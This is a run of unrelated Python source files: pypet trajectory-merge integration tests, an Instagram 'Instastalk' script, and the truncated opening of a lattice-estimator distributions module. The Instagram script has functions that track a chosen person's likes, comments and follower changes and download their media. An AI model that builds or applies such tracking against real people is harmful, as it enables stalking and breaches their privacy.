        self.trajs[0].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[0].f_store_item('rrororo33o333o3o3oo3')
        self.trajs[1].f_add_result('rrororo33o333o3o3oo3', 1234567890)
        self.trajs[1].f_store_item('rrororo33o333o3o3oo3')
        ##f_merge without destroying the original trajectory
        merged_traj = self.trajs[0]
        merged_traj.f_merge(self.trajs[1], move_data=False, delete_other_trajectory=False, remove_duplicates=True)
        merged_traj.f_load_skeleton()
        merged_traj.f_load(load_parameters=pypetconstants.UPDATE_DATA,
                           load_derived_parameters=pypetconstants.UPDATE_DATA,
                           load_results=pypetconstants.UPDATE_DATA,
                           load_other_data=pypetconstants.UPDATE_DATA)
        self.compare_trajectories(merged_traj, self.trajs[1])

    def explore(self, traj):
        # Base parameter space: 2 trials x 2 double arrays (4 runs).
        self.explored = {'Normal.trial': [0, 1],
                         'Numpy.double': [np.array([1.0, 2.0, 3.0, 4.0]), np.array([-1.0, 3.0, 5.0, 7.0])]}
        traj.f_explore(cartesian_product(self.explored, ('Numpy.double', 'Normal.trial')))

    def explore2(self, traj):
        # Alternative subspace: varies 'Normal.int' instead of 'Numpy.double'.
        self.explored2 = {'Normal.trial': [0, 1],
                          'Normal.int': [44, 45]}
        traj.f_explore(cartesian_product(self.explored2, ('Normal.int', 'Normal.trial')))

    def explore_trials_differently(self, traj):
        # Same trials as explore() but the first double array differs.
        self.explored = {'Normal.trial': [0, 1],
                         'Numpy.double': [np.array([-1.0, 2.0, 3.0, 5.0]), np.array([-1.0, 3.0, 5.0, 7.0])]}
        traj.f_explore(cartesian_product(self.explored, ('Numpy.double', 'Normal.trial')))

    def compare_explore_diff_subspace(self, traj):
        # Expected union space after merging explore() with explore2().
        self.explored = {'Normal.trial': [0, 1, 0, 1, 0, 1, 0, 1],
                         'Numpy.double': [np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0])],
                         'Normal.int': [42, 42, 42, 42, 44, 44, 45, 45]}
        traj.f_explore(self.explored)

    def compare_explore_more_trials_with_removing_duplicates(self, traj):
        # Expected space after a duplicate-removing merge (6 runs remain).
        self.explored = {'Normal.trial': [0, 1, 0, 1, 0, 1],
                         'Numpy.double': [np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([-1.0, 2.0, 3.0, 5.0]),
                                          np.array([-1.0, 2.0, 3.0, 5.0])]}
        traj.f_explore(self.explored)

    def compare_explore_more_trials(self, traj):
        # Expected space when merging via a trial parameter: trials 2 and 3
        # are the renumbered trials 0 and 1 of the second trajectory.
        self.explored = {'Normal.trial': [0, 1, 0, 1, 2, 3, 2, 3],
                         'Numpy.double': [np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([1.0, 2.0, 3.0, 4.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0]),
                                          np.array([-1.0, 3.0, 5.0, 7.0])]}
        traj.f_explore(self.explored)

    # def test_merging_wildcard(self):
    #     self.filenames = [make_temp_dir('experiments/tests/HDF5/merge_wild.hdf5'), 0, 0]
    #
    #     self.envs=[]
    #     self.trajs = []
    #
    #     for irun,filename in enumerate(self.filenames):
    #         if isinstance(filename,int):
    #             filename = self.filenames[filename]
    #
    #         self.make_environment( irun, filename)
    #
    #     self.trajs[0].f_add_derived_parameter('$', 45)
    #     self.trajs[1].f_add_derived_parameter('$', 47)
    #
    #     for traj in self.trajs:
    #         traj.f_store()
    #     self.trajs[0].f_merge(self.trajs[1])
    #     pass
class TestMergeResultsSort(ResultSortTest):
    """Checks that merging keeps per-run results correctly associated with
    their (x, y) parameter combinations."""

    tags = 'integration', 'hdf5', 'environment', 'merge'

    def setUp(self):
        """Create a second environment/trajectory pair to merge into the
        one that the base class sets up."""
        super(TestMergeResultsSort, self).setUp()
        env2 = Environment(trajectory=self.trajname + '2', filename=self.filename,
                           file_title=self.trajname,
                           log_stdout=False,
                           log_config=get_log_config(),
                           multiproc=self.multiproc,
                           wrap_mode=self.mode,
                           ncores=self.ncores)
        traj2 = env2.v_trajectory
        traj2.v_standard_parameter = Parameter
        traj2.f_add_parameter('x', 0)
        traj2.f_add_parameter('y', 0)
        self.env2 = env2
        self.traj2 = traj2

    def tearDown(self):
        # Disable logging of both environments before base-class cleanup.
        if hasattr(self, 'env'):
            self.env.f_disable_logging()
        if hasattr(self, 'env2'):
            self.env2.f_disable_logging()
        super(TestMergeResultsSort, self).tearDown()

    def test_merge_normally(self):
        """A plain merge of two 5-run trajectories yields all 10 runs."""
        self.explore(self.traj)
        self.explore2(self.traj2)
        len1 = len(self.traj)
        len2 = len(self.traj2)
        self.assertTrue(len1 == 5)
        self.assertTrue(len2 == 5)
        self.env.f_run(multiply)
        self.env2.f_run(multiply)
        self.traj.f_merge(self.env2.v_trajectory)
        self.assertTrue(len(self.traj) == len1 + len2)
        self.traj.f_load(load_results=pypetconstants.UPDATE_DATA)
        self.check_if_z_is_correct(self.traj)

    def test_merge_remove_duplicates(self):
        """With remove_duplicates, only the single differing run is added
        (5 original + 1 new = 6)."""
        self.explore(self.traj)
        self.explore2(self.traj2)
        len1 = len(self.traj)
        len2 = len(self.traj2)
        self.assertTrue(len1 == 5)
        self.assertTrue(len2 == 5)
        self.env.f_run(multiply)
        self.env2.f_run(multiply)
        self.traj.f_merge(self.env2.v_trajectory, remove_duplicates=True)
        self.assertTrue(len(self.traj) == 6)
        self.traj.f_load(load_results=pypetconstants.UPDATE_DATA)
        self.check_if_z_is_correct(self.traj)

    def explore(self, traj):
        # First parameter space.
        self.explore_dict = {'x': [0, 1, 2, 3, 4], 'y': [1, 1, 2, 2, 3]}
        traj.f_explore(self.explore_dict)

    def explore2(self, traj):
        # Differs from explore() only in the last y value (42 vs 3).
        self.explore_dict = {'x': [0, 1, 2, 3, 4], 'y': [1, 1, 2, 2, 42]}
        traj.f_explore(self.explore_dict)
class TestConsecutiveMerges(TrajectoryComparator):
    """Tests merging many trajectories in sequence, asserting that merge
    time does not grow linearly with the number of previous merges."""

    tags = 'integration', 'hdf5', 'environment', 'merge', 'consecutive_merge'

    def check_if_z_is_correct(self, traj):
        # Verify z == x * y for every run of the merged trajectory.
        for x in range(len(traj)):
            traj.v_idx = x
            self.assertTrue(traj.crun.z == traj.x * traj.y, ' z != x*y: %s != %s * %s' %
                            (str(traj.crun.z), str(traj.x), str(traj.y)))
        traj.v_idx = -1

    def set_mode(self):
        # Single-process, lock-wrapped defaults; subclasses may override.
        self.mode = 'LOCK'
        self.multiproc = False
        self.ncores = 1
        self.use_pool = True
        self.log_stdout = False
        self.freeze_input = False

    def explore(self, traj):
        self.explore_dict = {'x': range(10), 'y': range(10)}
        traj.f_explore(self.explore_dict)

    def setUp(self):
        self.envs = []
        self.trajs = []
        self.set_mode()
        self.filename = make_temp_dir(os.path.join('experiments', 'tests', 'HDF5', 'test.hdf5'))
        self.trajname = make_trajectory_name(self)

    def _make_env(self, idx, filename=None):
        """Create an Environment writing to `filename` (self.filename by default)."""
        if filename is None:
            filename = self.filename
        return Environment(trajectory=self.trajname + str(idx), filename=filename,
                           file_title=self.trajname,
                           log_stdout=False,
                           log_config=get_log_config(),
                           multiproc=self.multiproc,
                           wrap_mode=self.mode,
                           ncores=self.ncores)

    @staticmethod
    def strictly_increasing(L):
        # True iff every element is strictly smaller than its successor.
        return all(x < y for x, y in zip(L, L[1:]))

    def test_consecutive_merges(self):
        """Merge 40 trajectories one after another; the per-merge timings
        must not increase strictly or correlate linearly with merge count."""
        ntrajs = 41
        for irun in range(ntrajs):
            self.envs.append(self._make_env(irun))
            self.trajs.append(self.envs[-1].v_traj)
            self.trajs[-1].f_add_parameter('x', 0)
            self.trajs[-1].f_add_parameter('y', 0)
            self.explore(self.trajs[-1])
        for irun in range(ntrajs):
            self.envs[irun].f_run(multiply)
        merge_traj = self.trajs[0]
        merge_traj.f_load_skeleton()
        timings = []
        for irun in range(1, ntrajs):
            start = time.time()
            merge_traj.f_merge(self.trajs[irun], backup=False, consecutive_merge=True)
            end = time.time()
            delta = end - start
            timings.append(delta)
        # Test if there is no linear dependency for consecutive merges:
        if self.strictly_increasing(timings) and len(timings) > 1:
            raise ValueError('Timings %s are strictly increasing' % str(timings))
        r, alpha = pearsonr(range(len(timings)), timings)
        logging.error('R and Alpha of consecutive merge test %s' % str((r, alpha)))
        if alpha < 0.001 and r > 0:
            raise ValueError('R and Alpha of consecutive merge test %s\n' % str((r, alpha)),
                             'Timings %s are lineary increasing' % str(timings))
        merge_traj.f_store()
        merge_traj.f_load(load_data=2)
        self.check_if_z_is_correct(merge_traj)

    def test_merge_all_in_folder(self):
        """merge_all_in_folder combines every HDF5 file found in a directory."""
        self.filename = make_temp_dir(os.path.join('experiments', 'tests', 'HDF5', 'subfolder',
                                                   'test.hdf5'))
        path, _ = os.path.split(self.filename)
        ntrajs = 4
        total_len = 0
        for irun in range(ntrajs):
            new_filename = os.path.join(path, 'test%d.hdf5' % irun)
            self.envs.append(self._make_env(irun, filename=new_filename))
            self.trajs.append(self.envs[-1].v_traj)
            self.trajs[-1].f_add_parameter('x', 0)
            self.trajs[-1].f_add_parameter('y', 0)
            self.explore(self.trajs[-1])
            total_len += len(self.trajs[-1])
        for irun in range(ntrajs):
            self.envs[irun].f_run(multiply)
        merge_traj = merge_all_in_folder(path, delete_other_files=True)
        merge_traj.f_load(load_data=2)
        self.assertEqual(len(merge_traj), total_len)
        self.check_if_z_is_correct(merge_traj)

    def test_merge_many(self):
        """f_merge_many merges a whole list of trajectories in one call."""
        ntrajs = 4
        for irun in range(ntrajs):
            self.envs.append(self._make_env(irun))
            self.trajs.append(self.envs[-1].v_traj)
            self.trajs[-1].f_add_parameter('x', 0)
            self.trajs[-1].f_add_parameter('y', 0)
            self.explore(self.trajs[-1])
        for irun in range(ntrajs):
            self.envs[irun].f_run(multiply)
        merge_traj = self.trajs[0]
        total_len = 0
        for traj in self.trajs:
            total_len += len(traj)
        merge_traj.f_merge_many(self.trajs[1:])
        merge_traj.f_load(load_data=2)
        self.assertEqual(len(merge_traj), total_len)
        self.check_if_z_is_correct(merge_traj)

    def tearDown(self):
        # Stop logging of every created environment before base cleanup.
        for env in self.envs:
            env.f_disable_logging()
        super(TestConsecutiveMerges, self).tearDown()
if __name__ == '__main__':
    # Parse optional command line arguments and run the whole merge suite.
    opt_args = parse_args()
    run_suite(**opt_args)
<filename>scratch.py
import os
import urllib
import time
from dependencies.instagram import InstagramAPI, InstagramAPIError, InstagramClientError
from dependencies.instagram import models
from string import Template
import subprocess
from operator import attrgetter
from my_instagram_api import MyInstagramAPI, UserSet
import dependencies.simplejson as json
import datetime
from functools import wraps
import inspect
# Errors
from dependencies.instagram.httplib2 import ServerNotFoundError
# Instagram API Errors
# Instagram API error identifiers (error_type strings reported by the client library)
PRIVATE_USER = 'APINotAllowedError'
RATE_LIMITED = 'Rate limited'
INVALID_RESOURCE = 'APINotFoundError'
INSUFFICIENT_SCOPE = 'OAuthPermissionsException'
# NOTE(review): value looks like a redacted placeholder ('<PASSWORD>') — confirm the
# real OAuth error identifier before relying on this constant.
INVALID_TOKEN = 'OAuth<PASSWORD>'
INVALID_PARAMETERS = 'APIInvalidParametersError'
# globals
# NOTE(review): 'global' statements at module level are no-ops; kept as-is.
global _api
global DEBUG
DEBUG = False  # toggled True when run as a script (see the __main__ guard below)
HOME = os.environ['HOME']
# Alfred 2 workflow cache/data directories (macOS-specific paths)
CACHE_DIR = HOME + '/Library/Caches/com.runningwithcrayons.Alfred-2/Workflow Data/com.dalimatt.Instastalk'
DATA_DIR = HOME + '/Library/Application Support/Alfred 2/Workflow Data/com.dalimatt.Instastalk'
# Instantiate the instagram api
_api = MyInstagramAPI()
######################################################################
################### Primary Instagram functions ######################
######################################################################
def media_of_users(users, min_timestamp=None, max_timestamp=None):
    """Get recent media of *users* within an optional UNIX-timestamp window.

    :param users: sequence of user objects (need ``.id`` and ``.username``)
    :param min_timestamp: earliest creation time; defaults to 7 days ago
    :param max_timestamp: latest creation time; defaults to now
    :returns: list of media sorted from most recent to least recent
    """
    DAY = 24 * 60 * 60  # seconds in a day
    now = int(time.time())
    # Compute minimum UNIX timestamp, default is 7 days before now
    if not min_timestamp:
        min_timestamp = now - 7 * DAY
    min_timestamp = int(min_timestamp)  # instagram needs ints
    # BUG FIX: int(None) raised TypeError whenever max_timestamp was omitted;
    # default the upper bound to the current time instead.
    if max_timestamp is None:
        max_timestamp = now
    max_timestamp = int(max_timestamp)
    # Fetch the media of all the given users within the prescribed timeframe
    total_media = []
    for idx, user in enumerate(users):
        params = {'user_id': user.id,
                  'max_timestamp': max_timestamp,
                  'min_timestamp': min_timestamp}
        new_media = user_media(**params)
        # user_media returns -1 if the user is private and not accessible
        if new_media != -1:
            myprint('{0} of {1}. Got {2} media from user: {3}'.format(
                idx + 1, len(users), len(new_media), user.username))
            if new_media:
                total_media += new_media
        else:
            myprint('{0} of {1}. User {2} is private.'.format(
                idx + 1, len(users), user.username))
    # Return the media sorted from most recent to least
    return sorted(total_media, key=attrgetter('created_time'), reverse=True)
def user_media(user_id, verbose=False, max_pages=10, **kwargs):
    """Fetch all media of a user, up to ``max_pages`` pages of results.

    :param user_id: id of the user to query
    :param verbose: if True, supply a progress message template to the api helper
    :param max_pages: maximum number of result pages to fetch
    :returns: list of media, or -1 when the account is private
    """
    try:
        user = _api.user(user_id=user_id)
    except InstagramAPIError as err:
        if err.error_type == PRIVATE_USER:
            return -1
        else:
            raise err
    per_page = _api.api_results_per_page['user_recent_media']
    media_count = user.counts['media']
    expected = min(media_count, max_pages * per_page)
    if verbose:
        # {{len_content}} stays a literal {len_content} placeholder that the
        # api helper fills in later.
        message = 'Retrieved {{len_content}} media of {0} out of a total of {1}'.format(
            expected, media_count)
    else:
        message = None
    return _api.all_user_recent_media(
        user_id, max_pages=max_pages, message_template=message, **kwargs)
######################################################################
################## Secondary Instagram functions #####################
######################################################################
def liked_media(user_id, media):
    """Return the subset of *media* that has been liked by *user_id*.

    :param user_id: id of the potential liker
    :param media: list of media objects to search through
    :returns: list of media liked by the user (possibly partial on client error)
    """
    # Initialize update message generator
    update_message = print_update_message(len(media))
    update_message.send(None)
    myprint('Commencing search...')
    user_likes = []
    for idx, target_media in enumerate(media):
        try:
            likes = _api.media_likes(target_media.id)
        except InstagramClientError as err:
            # BUG FIX: this handler used to ``return likes`` — a NameError on
            # the very first iteration and the wrong value (raw likers of the
            # previous medium) afterwards. Report and return what was matched
            # so far instead.
            myprint(repr(err))
            return user_likes
        except InstagramAPIError as err:
            if err.error_type == INVALID_RESOURCE:
                myprint('Invalid media: {}'.format(target_media.id))
            else:
                raise err
        else:
            like_set = UserSet(likes)
            if user_id in like_set:
                user_likes.append(target_media)
        message = Template('$running_time seconds. Found {0} likes. {1} media searched out of {2}, {3} api calls remaining'
                           .format(len(user_likes),
                                   idx + 1,
                                   len(media),
                                   _api.last_used_api.x_ratelimit_remaining))
        update_message.send((idx, message))
    return user_likes
def media_comments(media, verbose=False):
    """Get the comments of every medium in *media*.

    :param media: list of media objects
    :param verbose: if True, print periodic progress messages
    :returns: dict mapping each medium to its list of comments
    """
    # Initialize message generator only when progress output is wanted
    if verbose:
        update_message = print_update_message(list_length=len(media), update_interval=5)
        update_message.send(None)
        myprint('Retrieving comments...')
    # Retrieve all comments
    all_comments = {}
    comments_total = 0
    for idx, medium in enumerate(media):
        comments = _api.media_comments(media_id=medium.id)
        comments_total += len(comments)
        all_comments[medium] = comments
        if verbose:
            # PERF FIX: the progress Template (and the rate-limit attribute
            # read) used to be built on every iteration even when verbose was
            # False; only build it when it will actually be displayed.
            message = Template('$running_time seconds. Retrieved {0} comments from {1} media out of {2}. {3} api calls remaining'.format(
                comments_total,
                idx + 1, len(media),
                _api.last_used_api.x_ratelimit_remaining))
            update_message.send((idx, message))
    return all_comments
def search_medium(search_queries, medium, ignore_likes=False):
    """Search one medium's users-in-photo, comments, likes, caption and tags.

    :param search_queries: list of query strings
    :param medium: medium object to inspect
    :param ignore_likes: skip the (api-expensive) likes lookup when True
    :returns: list of booleans, one per query, True where the query matched
    """
    results = [False for _ in range(len(search_queries))]
    comments = media_comments([medium])
    try:  # Catch resource not found exception
        if not ignore_likes:
            likes = _api.media_likes(medium.id)
        for idx, query in enumerate(search_queries):
            # Search users in photo
            for user_in_photo in medium.users_in_photo:
                if query in user_in_photo.user.username:
                    results[idx] = True
            # Search comments
            for comment in comments[medium]:
                if query in comment.user.username or query in comment.text:
                    results[idx] = True
            # Search likes
            if not ignore_likes:
                for like in likes:
                    if query in like.username:
                        results[idx] = True
            # Search the caption
            if medium.caption:
                if query in medium.caption.text:
                    results[idx] = True
            # Search tags
            for tag in medium.tags:
                if query in tag.name:
                    results[idx] = True
    except InstagramAPIError as err:
        if err.error_type == INVALID_RESOURCE:
            # BUG FIX: returning the bare ``False`` here crashed callers such
            # as ``search_media`` that enumerate the result; return the
            # per-query list (all/partly False) to keep the return type stable.
            return results
        else:
            raise err
    return results
def search_media(search_queries, media, ignore_likes=True):
    """Search many media for each query string; see ``search_medium`` for the
    fields that are inspected.

    :param search_queries: a single query string or a list of them
    :param media: list of media objects to search
    :param ignore_likes: skip the likes lookup when True
    :returns: one list of matching media per query, in query order
    """
    # Initialize update message
    update_message = print_update_message(len(media))
    update_message.send(None)
    # Normalize input and prepare one result bucket per query
    if type(search_queries) is not list:
        search_queries = [search_queries]
    matches = [[] for _ in search_queries]
    # Iterate through media looking for matches to the queries
    for media_idx, medium in enumerate(media):
        hits = search_medium(search_queries, medium, ignore_likes=ignore_likes)
        for query_idx, hit in enumerate(hits):
            if hit:
                matches[query_idx].append(medium)
        # Send update message
        counts = repr([len(bucket) for bucket in matches])
        message = Template(
            'Found {} matches in {} media out of {}. {} api calls remaining'.format(
                counts, media_idx + 1, len(media),
                _api.last_used_api.x_ratelimit_remaining))
        update_message.send((media_idx, message))
    return matches
def user_commented(user_id, comments):
    """Collect every comment made by *user_id* from a comments mapping.

    :param user_id: id of the commenter to look for
    :param comments: dict mapping media to their comment lists
    :returns: tuple ``(media, user_comments)`` of parallel lists
    """
    matched_media = []
    matched_comments = []
    for medium, comment_list in comments.items():
        for comment in comment_list:
            if comment.user.id == user_id:
                matched_comments.append(comment)
                matched_media.append(medium)
    return (matched_media, matched_comments)
def users_in_media(user_ids, media):
    """Return the media in which any of *user_ids* appears in the photo.

    :param user_ids: a single user id or a list of ids
    :param media: list of media objects (need ``.users_in_photo``)
    :returns: list of matching media, in the original order
    """
    if type(user_ids) is not list:
        user_ids = [user_ids]
    selected = []
    for medium in media:
        tagged_ids = [entry.user.id for entry in medium.users_in_photo]
        if any(uid in tagged_ids for uid in user_ids):
            selected.append(medium)
    return selected
######################################################################
########################## Stalk functions ###########################
######################################################################
def stalk_likes_in_follows(user_id, beginning_days_ago=3,
                           until_days_ago=0, filename=None):
    """Find likes of a user among the recent media of everybody they follow.

    :param user_id: id of the user whose likes are searched
    :param beginning_days_ago: start of the time window, in days before now
    :param until_days_ago: end of the time window, in days before now
    :param filename: if given, write the urls of the liked media to this file
    :returns: list of liked media
    """
    DAY = 24 * 60 * 60
    now = int(time.time())
    # Gather all media posted by the user's follows inside the time window
    follows = _api.all_user_follows(user_id)
    total_media = media_of_users(
        users=follows,
        min_timestamp=now - beginning_days_ago * DAY,
        max_timestamp=now - until_days_ago * DAY)
    # Check which of those media the user has liked
    likes = liked_media(user_id, total_media)
    # Optionally persist the urls of the liked media
    if filename:
        write_media_urls(likes, filename)
    return likes
def stalk_likes_of_user(liker_id, liked_id, **kwargs):
    """Check whether *liker_id* has liked any media of *liked_id*.

    :param liker_id: id of the potential liker
    :param liked_id: id of the account whose media are scanned
    :returns: list of liked media, or -1 if the target account is private
    """
    kwargs.setdefault('max_pages', 100)
    media = user_media(liked_id, verbose=True, **kwargs)
    if media == -1:
        # Private account: propagate user_media's sentinel
        return -1
    return liked_media(liker_id, media)
def stalk_comments_of_user(commenter_id, commentee_id, max_pages=100):
    """Check whether a user has commented on another user's media.

    :param commenter_id: id of the potential commenter
    :param commentee_id: id of the account whose media are scanned
    :param max_pages: maximum result pages fetched per media listing
    :returns: tuple of (media commented on, the matching comments)
    """
    target_media = user_media(user_id=commentee_id, verbose=True, max_pages=max_pages)
    all_comments = media_comments(target_media)
    return user_commented(commenter_id, all_comments)
######################################################################
############### Compare current data to stored data ##################
######################################################################
class compare_follow_data(object):
    """Decorator factory comparing a user's current follow data against a
    locally stored snapshot and reporting additions/removals.

    :param follow_data_type: either ``'follows'`` or ``'followed_by'``
    """

    def __init__(self, follow_data_type):
        if follow_data_type == 'follows':
            self.follow_type = 'follows'
            self.instagram_api_function = _api.all_user_follows
        elif follow_data_type == 'followed_by':
            self.follow_type = 'followed_by'
            self.instagram_api_function = _api.all_user_followed_by
        else:
            # BUG FIX: an unknown type used to silently produce a broken
            # decorator (missing attributes); fail fast instead.
            raise ValueError(
                "follow_data_type must be 'follows' or 'followed_by', got {0!r}".format(
                    follow_data_type))

    def __call__(self, follow_function):
        @wraps(follow_function)
        def wrapped_follow_function(user_id, update_data=True, data_dir=None):
            """Fetch current follow data, diff it against the stored snapshot
            and (optionally) refresh the snapshot on disk.

            :returns: ``(new_users, removed_users)`` lists, or None when no
                stored snapshot exists yet
            """
            if not data_dir:
                data_dir = os.path.join(HOME, 'Documents', 'Instagram', 'user_data')
            # Call instagram api for follows or followed_by
            current_data = self.instagram_api_function(user_id, max_pages=500)
            # Retrieve stored version of data if it exists
            stored_data_exists = False
            # BUG FIX: str() so integer user ids do not raise TypeError here
            data_path = os.path.join(
                data_dir, str(user_id) + '_{0}.json'.format(self.follow_type))
            if os.path.exists(data_path):
                with open(data_path, 'r') as data_file:
                    temp_user_data = json.load(data_file)
                # Convert data to user objects
                stored_data = [models.User.object_from_dictionary(u)
                               for u in temp_user_data]
                stored_data_exists = True
            # Update stored data to current version
            if update_data:
                # Make directory structure
                if not os.path.exists(data_dir):
                    os.makedirs(data_dir)
                with open(data_path, 'w') as data_file:
                    data_dict = [u.dictionary_from_object() for u in current_data]
                    data_file.write(json.dumps(data_dict))
                # BUG FIX: this message used to sit *after* the return
                # statements below and was unreachable.
                myprint('Updated {0} data to current information'.format(
                    self.follow_type).replace('_', ' '))
            # Compare current and stored data (if a stored version exists)
            if stored_data_exists:
                # Convert data objects to UserSets
                set_stored_data = UserSet(stored_data)
                set_current_data = UserSet(current_data)
                # Compare sets to find new and removed users
                new_users = set_current_data - set_stored_data
                removed_users = set_stored_data - set_current_data
                myprint('New {0}:'.format(self.follow_type).replace('_', ' '))
                for u in new_users:
                    myprint('\t{0}'.format(u.username))
                myprint('Removed {0}:'.format(self.follow_type).replace('_', ' '))
                for u in removed_users:
                    myprint('\t{0}'.format(u.username))
                return (list(new_users), list(removed_users))
            else:
                # BUG FIX: the format placeholder was missing, so the follow
                # type never appeared in this message.
                myprint('No stored version of {0}'.format(
                    self.follow_type).replace('_', ' '))
                return None
        return wrapped_follow_function
@compare_follow_data('follows')
def compare_new_follows(user_id, update_data=True):
    """Compare the accounts *user_id* follows against the stored snapshot.

    The body is intentionally empty: the ``compare_follow_data`` decorator
    replaces it entirely with the comparison logic.
    """
    pass
@compare_follow_data('followed_by')
def compare_new_followed_by(user_id, update_data=True):
    """Compare the accounts following *user_id* against the stored snapshot.

    The body is intentionally empty: the ``compare_follow_data`` decorator
    replaces it entirely with the comparison logic.
    """
    pass
######################################################################
######################### Helper functions ###########################
######################################################################
def write_media_urls(media, path='/Desktop/urls.txt'):
    """Write an iconosquare viewer url for each medium to a file.

    :param media: list of media objects (need ``.id``)
    :param path: destination path relative to the user's home directory
    """
    viewer_prefix = 'http://iconosquare.com/viewer.php#/detail/'
    urls = [viewer_prefix + medium.id for medium in media]
    home = os.environ['HOME']
    # BUG FIX: the file used to be opened in binary mode ('wb') while text
    # strings were written, which raises TypeError under Python 3; open in
    # text mode instead.
    with open(home + path, 'w') as url_file:
        for url in urls:
            url_file.write(url + '\n')
def download_images(media, media_dir, resolution='standard_resolution'):
    """Download the image of every medium in *media* into *media_dir*.

    :param media: list of media objects (need ``.id`` and ``.images``)
    :param media_dir: target directory; created when missing
    :param resolution: key into ``medium.images`` selecting the image size
    """
    # Ensure the target directory exists
    if not os.path.exists(media_dir):
        os.makedirs(media_dir)
    for medium in media:
        image_url = medium.images[resolution].url
        extension = image_url.split('.')[-1]
        target_path = media_dir + '/' + medium.id + '.' + extension
        # NOTE(review): urllib.urlopen is the Python-2 API this script targets
        image_bytes = urllib.urlopen(image_url).read()
        with open(target_path, 'wb') as image_file:
            image_file.write(image_bytes)
def download_media_of_user(media, media_dir=None, resolution='standard_resolution'):
    """Download the video (preferred) or image of each medium to disk.

    Files are written into a per-user, per-date folder derived from
    *media_dir* (default: ~/Desktop/Downloaded Media).

    :param media: non-empty list of media objects of a single user
    :param media_dir: base directory for the download folder
    :param resolution: key selecting the rendition to download
    """
    media_urls = []
    for medium in media:
        media_id = medium.id
        try:
            # Prefer the video rendition when the medium has one
            media_url = medium.videos[resolution].url
        except (AttributeError, KeyError):
            # BUG FIX: a bare ``except`` here also swallowed unrelated errors
            # (including KeyboardInterrupt); only fall back to the image when
            # the video rendition is genuinely missing.
            media_url = medium.images[resolution].url
        media_urls.append((media_id, media_url))
    if not media_dir:
        media_dir = os.path.join(HOME, 'Desktop', 'Downloaded Media')
    now = time.time()
    date = datetime.datetime.fromtimestamp(now).strftime('(%b%d_%Y)')
    username = media[0].user.username
    # NOTE(review): the folder name is built by plain concatenation
    # ('...Downloaded Media<user>(date)', no separator); confirm this is
    # intentional before changing it.
    media_dir = media_dir + username + date
    # Check directory structure
    if not os.path.exists(media_dir):
        os.makedirs(media_dir)
    for media_id, media_url in media_urls:
        filetype = media_url.split('.')[-1]
        filename = media_id + '.' + filetype
        data = urllib.urlopen(media_url).read()
        with open(os.path.join(media_dir, filename), 'wb') as media_file:
            media_file.write(data)
def print_update_message(list_length, update_interval=5):
    """Coroutine that prints a progress message at most every
    ``update_interval`` seconds.

    Prime it with ``gen.send(None)``, then feed ``(idx, message_template)``
    tuples; ``message_template`` must be a ``string.Template`` with a
    ``$running_time`` placeholder.

    :param list_length: total number of items; the final item always prints
    :param update_interval: minimum seconds between printed updates
    """
    # Display updates of the information every 5 seconds
    start = time.time()
    interval_start = start
    while True:
        (idx, message_template) = yield
        now = time.time()
        interval = now - interval_start
        # Print when enough time has passed, on the very first item (the
        # identity check ``interval_start is start`` only holds before the
        # first print — deliberate), or on the last item.
        if interval > update_interval or \
                interval_start is start or \
                (idx + 1) == list_length:
            myprint(message_template.substitute(running_time='{0:0.2f}'.\
                format(now-start)))
            interval_start = now
def open_media(media):
    """Open the iconosquare viewer page of one medium (or of every medium in
    a list) in the default browser via the macOS ``open`` command."""
    viewer_prefix = 'http://iconosquare.com/viewer.php#/detail/'
    if type(media) is not list:
        subprocess.Popen(['open', viewer_prefix + media.id])
        return
    for medium in media:
        subprocess.Popen(['open', viewer_prefix + medium.id])
        # throttle so the browser is not flooded with tabs at once
        time.sleep(2)
######################################################################
######################## Utility functions ###########################
######################################################################
def myprint(the_string):
    """Print *the_string* only when the module-level DEBUG flag is set.

    Uses the print() function instead of the Python-2-only print statement so
    the module stays importable under both Python 2 and Python 3.
    """
    if DEBUG:
        print(the_string)
# Script entry point: enable debug output when run directly.
if __name__ == '__main__':
    DEBUG = True
|
r"""
Module for distributions to specify secret and error distributions.
Contains Uniform and Gaussian distributions with various constructors and utility methods. Instances can be transformed to bounds in various norms.
We write ``sigma`` to denote the standard deviation :math:`\sigma` and :math:`s` to denote the Gaussian width parameter :math:`s = \sigma \cdot \sqrt{2\pi}` and :math:`\alpha = s / q = \sqrt{2\pi} \sigma / q`.
"""
from abc import ABC, abstractmethod
from . import norm
import sage.all
from sage.functions.log import log
from sage.functions.other import sqrt
from sage.rings.all import QQ, RR
from sage.symbolic.all import pi
from sage.symbolic.all import pi, e
import estimator as est
from sage.misc.functional import round
oo = est.PlusInfinity()
# Error Parameter Conversion (extension to functions in estimator.py)
def alpha_to_stddevf(alpha, q):
    r"""
    noise rate :math:`\alpha`, modulus q → standard deviation :math:`\sigma`

    :param alpha: noise rate
    :param q: modulus `0 < q`
    :returns: :math:`\sigma = \alpha \cdot q / \sqrt{2\pi}`
    """
    # The estimator converts a Gaussian width parameter s into a standard
    # deviation; s = alpha * q here.
    width = alpha * q
    return est.stddevf(width)
class Distribution:
    """Base class for secret/error distributions.

    Subclasses implement :meth:`get_alpha` to report the noise rate of an
    (approximately) equivalent discrete Gaussian.
    """
    def get_alpha(self, q=None, n=None):
        # Intentionally a no-op: subclasses override this.
        pass
class Uniform(norm.BaseNorm, Distribution):
    r"""
    Uniform distribution.

    Can be specified via bound :math:`(a, b)` and optional number of non-zero components :math:`h`, or uniformly :math:`\mod q`.
    """

    def __init__(
        self, a=None, b=None, h=None, uniform_mod_q=False, q=None, dimension=None
    ):
        r"""
        :param a: lower bound if b is specified, else take range [-a, a]
        :param b: upper bound, optional
